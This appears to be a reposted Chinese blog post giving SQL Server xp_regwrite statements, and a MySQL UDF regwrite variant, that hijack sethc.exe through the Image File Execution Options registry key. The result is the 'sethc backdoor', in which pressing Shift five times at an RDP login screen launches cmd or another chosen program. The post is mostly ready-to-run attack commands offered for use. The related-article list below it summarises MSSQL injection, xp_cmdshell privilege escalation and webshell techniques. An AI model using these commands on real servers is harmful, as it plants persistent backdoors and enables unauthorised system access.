SA权限下的映象劫持语句

最新推荐文章于 2022-04-11 14:38:11 发布
最新推荐文章于 2022-04-11 14:38:11 发布
阅读量1.5k 收藏
点赞数
分类专栏: 操作系统 文章标签: file cmd c
http://www.heibai.net/articles/hacker/base/2009/1205/3666.html
SA权限下有时不能执行命令,下面给出注册表提权的劫持语句 :exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE// Microsoft//Windows NT//CurrentVersion//Image File Execution Options//sethc.exe','debugger','REG_SZ','c://windows//explorer.

 

  

SA权限下有时不能执行命令,下面给出注册表提权的劫持语句

:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE// Microsoft//Windows NT//CurrentVersion//Image File Execution Options//sethc.exe','debugger','REG_SZ','c://windows//explorer.exe'
:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE// Microsoft//Windows NT//CurrentVersion//Image File Execution Options//sethc.exe','debugger','REG_SZ','c://windows//system32//taskmgr.exe'
 

写注册表函数.
select regwrite("HKEY_LOCAL_MACHINE","SOFTWARE// Microsoft//Windows NT//CurrentVersion//Image File Execution Options//sethc.exe","Debugger","REG_SZ","E://web//170stock//admin//include//explorer.exe");


通过udf提权加上regwrite这个函数
然后改注册表,把sethc.exe 的路径改成了我们想运行的程序(比如cmd)
然后连3389,按下5次shift就执行我我们的程序,很好,就是sethc后门原理

不过管理组做了手脚,我们加到localgroup administrators的用户进不去3389

liuyukuan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【微服务】springboot 整合 SA-Token 使用详解
congge
08-04 1万+
springboot 整合 SA-Token 使用详解
详解比springSecurity和shiro更简单优雅的轻量级Sa-Token框架,比如登录认证,权限认证,单点登录,OAuth2.0,分布式Session会话,微服务网关鉴权
念兮为美
08-30 3843
详解比springSecurity和shiro更简单优雅的轻量级Sa-Token框架,比如登录认证,权限认证,单点登录,OAuth2.0,分布式Session会话,微服务网关鉴权。演示SpringBoot集成Sa-Token和Spring WebFlux集成Sa-Token这两个常用的开发框架。......
mssql注入,sa权限被降为network service 得到webshell方法
Civil_War的专栏
07-19 2174
如果sa只有network service 权限,网上能搜索到的那些提权方法都是不能用的,这个内置账户的权限相当于USER.如果你无法通过数据库备份或通过SP_makewebtask得到webshell,可以这么做:xp_cmdshell可以cacls d: /e /t /g n
***客户端PC通过SA权限,到内网域***系类
weixin_34279184的博客
03-14 113
整体框架图利用msfuseauxiliary/scanner/portscan/tcp可以进行扫一些相关的端口。发现1433端口以后,进行对mssql尝试进行暴力破解Mssql_login破解完以后(这个破解也主要看字典)进行mssql自己的特性,xp_cmdshell进行命令操作UseAuxiliary/scanner/mssql/mssql_execSetr...
在Win XP及Win 2003下使用程序方式(C#)设置共享文件夹的文件夹权限的问题及解决方案。...
weixin_30840253的博客
02-16 212
这几天由于工作需要,需要用C#开发一个设置文件夹共享,并为共享的文件夹设置共享权限的功能。在开发过程中发现了一些有趣的问题,就是如果用程序的方式创建一个共享目录,那么就是无法直接用程序的方式设置它的共享权限。更为奇怪的是如果手动去改下下共享权限 (改前和改后的设置都一样),就可以以程序的方式设置 共享权限了。这里我贴出创建共享目录的代码/// <summary> //...
sa权限(MSSQL注入SA权限不显错模式下的入侵)
Coisini的博客
05-27 2172
内容:MSSQL注入SA权限不显错模式下的入侵 一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。 我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。 这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和...
SQL Server SA权限总结经典技术
12-15
前提需要工具:SQL Query Analyzer和SqlExec Sunx Version 第一部分: 有关去掉xp_cmdshell来保护系统的分析总结: 首先知道一下语句: 1.去掉xp_cmdshell扩展过程的方法是使用如下语句: if exists (select...
使用sa-token 进行权限控制
java大神起床啦
04-11 7282
sa-token
sa提权
a15914389907的博客
03-04 490
首先说一下具体的情况 一大牛发了一个shell 挂个txt收徒、 乱码了就算了 省的那大牛找我麻烦 心理就想着日一下看看 结果真不如人心愿 御剑开骚 哇塞 列目录 这下高兴之 不上图了 发现大牛踪迹 我想着那位收徒的也是吧 (他自己说的 只是路过的) 好了废话不多说直接开始 搞吧 上传一句话菜刀链接 习惯性的打开菜刀 虚拟终...
NT AUTHORITY\NETWORK SERVICE 权限问题
weixin_30892987的博客
04-09 388
错误描述信息: The current identity (NT AUTHORITY\NETWORK SERVICE) does not have write access to 'X:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files'。 问题原因: 先安装了Framework 2.0,然后安装了...
sqlserver 2000 未能找到存储过程 master.dbo.xp_dirtree
移动开发
06-15 2213
解决未能找到存储过程 master.dbo.xp_dirtree 把恢复数据库需要用到的存储过程个恢复 打开MSSQL查询分析器,分别运行下面的两条数据库语句即可. use master EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'
Network Service 权限问题
weixin_33966365的博客
08-15 2250
今天在做asp.net的定时删除服务器上的文件时,出了错误,在本地测试都好着呢,可是一部署到服务器上,删除文件的那个方法就不执行,后来在网站查了是Network Service权限设置问题,Network Service 是 Windows Server 2003 中的内置帐户。如果服务器的系统是03的,那么程序在对文件进行删除等操作时,需把Network Service用户的权限设置成可修改即可...
SQL2005之SA提权总结
weixin_34346099的博客
03-17 146
首先,看看xp_cmdshell存在不,不存在的话先恢复下。 Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;   然后,Exec master.dbo.xp_cmdshell 'net user' 持行命令。   SQL Serve...
MSsql2005 SA权限下的高级命令执行技巧与风险防范
本文档主要总结了Microsoft SQL Server 2005中的高级权限执行命令,特别是与`xp_cmdshell`存储过程相关的功能。`xp_cmdshell`是一个强大的系统级工具,它允许在服务器上执行操作系统命令,但在使用时需谨慎,因为它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值